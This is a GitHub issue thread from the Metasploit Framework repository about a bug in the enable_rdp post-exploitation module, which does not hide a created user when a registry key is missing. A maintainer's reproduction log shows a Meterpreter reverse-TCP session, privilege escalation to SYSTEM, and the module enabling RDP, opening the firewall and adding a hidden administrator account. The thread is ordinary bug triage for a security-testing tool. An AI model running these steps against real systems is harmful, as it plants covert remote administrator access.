search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.15k stars 13.97k forks source link

enable_rdp.rb Key Generator Error #7056

Open kainpark7894 opened 8 years ago

kainpark7894 commented 8 years ago

post/windows/manage/enable_rdp.rb

https://github.com/rapid7/metasploit-framework/blob/adb275520b9552d6760eae50d0cd8074976d215b/modules/post/windows/manage/enable_rdp.rb#L142

hide_user_key error

bug

//If the registry path does not work ->Login Sessions User Info Hide error

hide_user_key = 'HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList'

kainpark7894 commented 8 years ago

Video: https://youtu.be/RCURULJO93g

bwatters-r7 commented 8 years ago

Odd. I do not have that key on my test VM, yet the module still hides the user:

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <msf_IP>
lhost => <msf_IP>
msf exploit(handler) > set lport 4545
lport => 4545
msf exploit(handler) > run

[*] Started reverse TCP handler on <msf_IP>:4545 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to <target_IP>
[*] Meterpreter session 1 opened (<msf_IP>:4545 -> <target_IP>:49338) at 2016-08-11 13:23:24 -0700

meterpreter > getuid
Server username: WIN-CMLEMCUFOB2\bwatters
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-CMLEMCUFOB2
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/enable_rdp
msf post(enable_rdp) > show options

Module options (post/windows/manage/enable_rdp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ENABLE    true             no        Enable the RDP Service and Firewall Exception.
   FORWARD   false            no        Forward remote port 3389 to local Port.
   LPORT     3389             no        Local port to forward remote connection.
   PASSWORD                   no        Password for the user created.
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        The username of the user to create.

msf post(enable_rdp) > set username fakeuser
username => fakeuser
msf post(enable_rdp) > set password 12345
password => 12345
msf post(enable_rdp) > set session 1
session => 1
msf post(enable_rdp) > run

[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] Setting user account for logon
[*]     Adding User: fakeuser with Password: 12345
[*]     Adding User: fakeuser to local group 'Remote Desktop Users'
[*]     Hiding user from Windows Login screen
[*]     Adding User: fakeuser to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /home/bwatters/.msf4/loot/20160811132452_default_<target_IP>_host.windows.cle_227173.txt
[*] Post module execution completed
msf post(enable_rdp) >

Logged in as fakeuser via RDP:

rdp_1

Looking at the Accounts/Registry

rdp_2

@kainpark7894 am I missing a condition, or have I not followed a step correctly to reproduce the error?

kainpark7894 commented 8 years ago

regkey -> winlogin -> (special account) register key null -> enable_rdp -> no hide user

difference video 0:05 <> 0:49

OS : Windows7 64bit ultimate K version

bcoles commented 4 years ago

Bumping this issue because it's been reported by a few users as recently as 2019 and 2020.

The following patch was suggested by @Koraman in #11221.

registry_createkey(hide_user_key)

Edit: The discrepancies described in the thread above may possibly be due to differences between versions of Windows which don't support RDP (ie, Home) as described in #8873.

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

adfoster-r7 commented 1 year ago

I haven't looked into this fully yet; But just cross-referencing https://github.com/rapid7/metasploit-framework/pull/17336 due to the comment:

The discrepancies described in the thread above may possibly be due to differences between versions of Windows which don't support RDP (ie, Home)

We should ensure the version API has an easy way to check for Home etc, which would allow us to notify the user that the module won't work against the target